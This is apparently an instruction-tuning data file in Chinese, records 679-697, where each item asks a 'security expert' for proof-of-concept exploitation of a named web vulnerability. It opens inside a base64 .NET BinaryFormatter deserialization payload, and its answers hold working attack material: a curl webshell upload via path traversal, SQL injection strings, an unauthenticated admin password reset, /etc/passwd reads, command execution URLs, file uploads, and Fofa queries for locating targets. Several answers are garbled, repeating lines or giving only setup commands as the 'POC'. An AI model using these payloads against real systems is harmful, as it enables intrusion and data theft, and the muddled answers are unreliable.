nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=\",\"format\":\"3\"}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/金蝶 K3Cloud BinaryFormatter 反序列化漏洞.md"}
    679. 

  679. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:会捷通云视讯 list 目录文件泄露漏洞\n漏洞描述:会捷通云视讯某个文件 list参数 存在目录文件泄露漏洞,攻击者通过漏洞可以获取一些敏感信息\n影响版本:``` 会捷通云视讯 ```\n网络测绘:``` body=\"/him/api/rest/v1.0/node/role\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. body=\"/him/api/rest/v1.0/node/role\"\n2. /him/api/rest/V1.0/system/log/list?filePath=../\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/会捷通云视讯 list 目录文件泄露漏洞.md"}
    680. 

  680. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293\n漏洞描述:该漏洞是由于Afterlogic Aurora & WebMail Pro中对上传的文件过滤和限制存在缺陷,攻击者可以通过上传恶意文件,从而执行任意代码。 参考链接: - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26293 - https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26293-rce-via-public-unrestricted-file-upload-vulnerability.md - https://forum.ywhack.com/thread-115325-1-8.html\n影响版本:``` WebMail Pro ≤ 7.7.9 Afterlogic Aurora ≤ 7.7.9 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-26293\n【POC利用方法】\n1. WebMail Pro ≤ 7.7.9\nAfterlogic Aurora ≤ 7.7.9\n2. curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' \"https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php\"\n3. curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' \"https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021\"\n//使用无效路径获取SabreDAV错误查看Webroot路径\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293.md"}
    681. 

  681. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Jira cfx 任意文件读取漏洞 CVE-2021-26086\n漏洞描述:Atlassian Jira Server/Data Center 8.4.0 - Limited Remote File Read/Include\n影响版本:``` Atlassian Jira Server/Data Center 8.4.0 ```\n网络测绘:``` app=\"ATLASSIAN-JIRA\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-26086\n【POC利用方法】\n1. Atlassian Jira Server/Data Center 8.4.0\n2. app=\"ATLASSIAN-JIRA\"\n3. /s/cfx/_/;/WEB-INF/web.xml\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Jira cfx 任意文件读取漏洞 CVE-2021-26086.md"}
    682. 

  682. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞 CVE-2023-1454\n漏洞描述:JeecgBoot 企业级低代码平台 qurestSql接口存在 SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库中的敏感数据,进一步攻击\n影响版本:JeecgBoot 企业级低代码平台\n网络测绘:``` app=\"JeecgBoot-企业级低代码平台\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-1454\n【POC利用方法】\n1. app=\"JeecgBoot-企业级低代码平台\"\n2. POST /jeecg-boot/jmreport/qurestSql HTTP/1.1\nContent-Type: application/json\n\n{\"apiSelectId\":\"1290104038414721025\",\n\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}\n3. Content-Type: application/json\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞 CVE-2023-1454.md"}
    683. 

  683. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:pgAdmin ≤ 7.6 后台远程命令执行漏洞 CVE-2023-5002\n漏洞描述:pgAdmin 是一个著名的 PostgreSQL 数据库管理平台。 pgAdmin 包含一个 HTTP API 可以用来让用户选择并验证额外的 PostgreSQL 套件,比如 pg_dump 和 pg_restore。在 CVE-2022-4223 中,这个 API 可被用于执行任意命令,官方对此进行了修复,但在 7.6 版本及以前修复并不完全,导致后台用户仍然可以执行任意命令。 CVE-2023-5002 是一个针对 CVE-2022-4223 漏洞的补丁绕过漏洞。官方发布了下面两个修复补丁修复漏洞: - 给`validate_binary_path`函数增加`@login_required`装饰器,限制未授权的用户访问相关接口 - 使用`os.path.exists()`检查用户传入的路径是否有效 只有第二个修复补丁可以被绕过,所以该漏洞仅是一个后台命令执行漏洞。 参考链接: - https://github.com/pgadmin-org/pgadmin4/commit/35f05e49b3632a0a674b9b36535a7fe2d93dd0c2 - https://github.com/advisories/GHSA-ghp8-52vx-77j4\n影响版本:``` pgAdmin 版本 <= 7.6 ```\n网络测绘:``` \"pgadmin\" && icon_hash=\"1502815117\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-5002\n【POC利用方法】\n1. pgAdmin 版本 <= 7.6\n2. \"pgadmin\" && icon_hash=\"1502815117\"\n3. docker compose up -d\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/pgAdmin ≤ 7.6 后台远程命令执行漏洞 CVE-2023-5002.md"}
    684. 

  684. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金山 V8 V9 终端安全系统 文件上传漏洞\n漏洞描述:参考链接: - https://forum.butian.net/share/76\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. POST /tools/manage/upload.php HTTP/1.1\nHOST: target\n...\n<?php phpinfo(); ?>\n2. POST /tools/manage/upload.php HTTP/1.1\n3. - https://forum.butian.net/share/76\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/金山 V8 V9 终端安全系统 文件上传漏洞.md"}
    685. 

  685. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞\n漏洞描述:用友 畅捷通T+ RecoverPassword.aspx 存在未授权管理员密码修改漏洞,攻击者可以通过漏洞修改管理员账号密码登录后台\n影响版本:``` 用友 畅捷通T+ ```\n网络测绘:``` app=\"畅捷通-TPlus\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"畅捷通-TPlus\"\n2. POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd\n\n{\"pwdNew\":\"46f94c8de14fb36680850768ff1b7f2a\"}\n3. POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞.md"}
    686. 

  686. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Grafana mysql 后台任意文件读取漏洞 CVE-2019-19499\n漏洞描述:Grafana 是一个用于分析、监控和数据可视化的开源应用程序。数以千计的公司使用 Grafana,包括 PayPal、eBay 和 Intel 等主要代表。通过登录后台设置Mysql可以读取服务器中的任意文件\n影响版本:``` Grafana < 6.4.4 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2019-19499\n【POC利用方法】\n1. Grafana < 6.4.4\n2. docker pull grafana/grafana:6.4.3 \ndocker run -d --name=grafana -p 3000:3000 grafana/grafana:6.4.3\n3. 再创建一个恶意Mysql: https://github.com/allyshka/Rogue-MySql-Server\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Grafana mysql 后台任意文件读取漏洞 CVE-2019-19499.md"}
    687. 

  687. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:安徽阳光心健 心理测量平台 目录遍历漏洞 CNVD-2021-01929\n漏洞描述:安徽阳光心健心理咨询有限公司心理测量平台存在目录遍历漏洞,攻击者可利用该漏洞获取敏感信息。\n影响版本:``` 安徽阳光心健 心理测量平台 ```\n网络测绘:``` icon_hash=\"-320896955\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 安徽阳光心健 心理测量平台\n2. icon_hash=\"-320896955\"\n3. 访问 http://xxx.xxx.xxx.xxx/admin/\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/安徽阳光心健 心理测量平台 目录遍历漏洞 CNVD-2021-01929.md"}
    688. 

  688. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nexus Repository Manager 3 group 远程命令执行漏洞 CVE-2020-10199\n漏洞描述:Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞。 参考链接: - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 - https://github.com/threedr3am/learnjavabug/blob/93d57c4283/nexus/CVE-2020-10199/README.md - https://github.com/jas502n/CVE-2020-10199\n影响版本:``` Nexus < 3.21.1 ```\n网络测绘:``` app=\"Nexus-Repository-Manager\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-10199\n【POC利用方法】\n1. Nexus < 3.21.1\n2. app=\"Nexus-Repository-Manager\"\n3. docker-compose up -d\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Nexus Repository Manager 3 group 远程命令执行漏洞 CVE-2020-10199.md"}
    689. 

  689. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞\n漏洞描述:Evolucare Ecsimaging download_stats_dicom.php 存在文件读取漏洞,攻击者可利用该漏洞获取系统敏感信息等.\n影响版本:``` EVOLUCARE Evolucare Ecsimaging 6.21.5 ```\n网络测绘:``` body=\"ECSimaging\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. EVOLUCARE Evolucare Ecsimaging 6.21.5\n2. body=\"ECSimaging\"\n3. /download_stats_dicom.php?fullpath=/etc/passwd&filename=/etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞.md"}
    690. 

  690. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:任我行 CRM SmsDataList SQL注入漏洞\n漏洞描述:*任我行CRM*系统是客户关系管理,集OA自动化办公、OM目标管理、KM知识管理、HR人力资源为一体集成的企业管理软件。 任我行 CRM SmsDataList 接口存在SQL注入漏洞,攻击者通过漏洞可以执行任意数据库语句,获取敏感信息。\n影响版本:任我行 CRM\n网络测绘:\"欢迎使用任我行CRM\"\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nHost: \n\nKeywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000' and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI\n2. Content-Type: application/x-www-form-urlencoded\n3. POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/任我行 CRM SmsDataList SQL注入漏洞.md"}
    691. 

  691. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:nginxWebUI runCmd 远程命令执行漏洞\n漏洞描述:nginxWebUI runCmd 接口存在远程命令执行漏洞,攻击者通过漏洞可以获取到服务器权限,执行任意命令\n影响版本:nginxWebUI\n网络测绘:``` title=\"nginxwebui\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"nginxwebui\"\n2. /AdminPage/conf/runCmd?cmd=id\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/nginxWebUI runCmd 远程命令执行漏洞.md"}
    692. 

  692. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:phpMyAdmin后台SQL注入 CVE-2020-26935\n漏洞描述:在4.9.6之前的phpMyAdmin和5.0.3之前的5.x的SearchController中发现一个问题。在phpMyAdmin如何处理搜索功能中的SQL语句中发现了一个SQL注入漏洞。攻击者可以利用此漏洞将恶意SQL注入查询。 参考链接: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26935 - https://xz.aliyun.com/t/8524\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-26935\n【POC利用方法】\n1. http://127.0.0.1/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)\n2. - https://xz.aliyun.com/t/8524\n3. http://127.0.0.1/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/phpMyAdmin后台SQL注入 CVE-2020-26935.md"}
    693. 

  693. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GlassFish 任意文件读取漏洞\n漏洞描述:参考阅读: - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 java语言中会把`%c0%ae`解析为`\\uC0AE`,最后转义为ASCCII字符的`.`(点)。利用`%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/`来向上跳转,达到目录穿越、任意文件读取的效果。\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n3. java语言中会把`%c0%ae`解析为`\\uC0AE`,最后转义为ASCCII字符的`.`(点)。利用`%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/`来向上跳转,达到目录穿越、任意文件读取的效果。\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/GlassFish 任意文件读取漏洞.md"}
    694. 

  694. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:AJ-Report 认证绕过与远程代码执行漏洞 CNVD-2024-15077\n漏洞描述:AJ-Report 是全开源的一个 BI 平台。在其 1.4.0 版本及以前,存在一处认证绕过漏洞,攻击者利用该漏洞可以绕过权限校验并执行任意代码。 参考链接: - https://xz.aliyun.com/t/14460 - https://gitee.com/anji-plus/report/issues/I9HCB2 - https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md\n影响版本:``` version < v1.4.0 ```\n网络测绘:``` title=\"AJ-Report\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. version < v1.4.0\n2. title=\"AJ-Report\"\n3. docker compose up -d\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/AJ-Report 认证绕过与远程代码执行漏洞 CNVD-2024-15077.md"}
    695. 

  695. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:若依管理系统 Druid未授权访问\n漏洞描述:若依管理系统使用了Druid 默认开启了匿名访问,导致未授权获取敏感信息\n影响版本:``` 若依管理系统 ```\n网络测绘:``` app=\"若依-管理系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"若依-管理系统\"\n2. http://xxx.xxx.xxx.xxx/prod-api/druid/index.html\n3. http://xxx.xxx.xxx.xxx/prod-api/druid/index.html\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/若依管理系统 Druid未授权访问.md"}
    696. 

  696. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:广联达 Linkworks msgbroadcastuploadfile.aspx 后台文件上传漏洞\n漏洞描述:广联达 Linkworks msgbroadcastuploadfile.aspx 存在后台文件上传漏洞,攻击者通过SQL注入获取管理员信息后,可以登陆发送请求包获取服务器权限\n影响版本:广联达 Linkworks\n网络测绘:``` web.body=\"/Services/Identification/\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. web.body=\"/Services/Identification/\"\n2. POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1\nHost: \nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj\nCookie: 0_styleName=styleA\n\n------WebKitFormBoundaryFfJZ4PlAZBixjELj\nContent-Disposition: form-data; filename=\"1.aspx\";filename=\"1.jpg\"\nContent-Type: application/text\n\nTest\n\n------WebKitFormBoundaryFfJZ4PlAZBixjELj--\n3. /GTP/IM/Services/Group/Upload/xxx-xxx-test.aspx\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/广联达 Linkworks msgbroadcastuploadfile.aspx 后台文件上传漏洞.md"}
    697. 

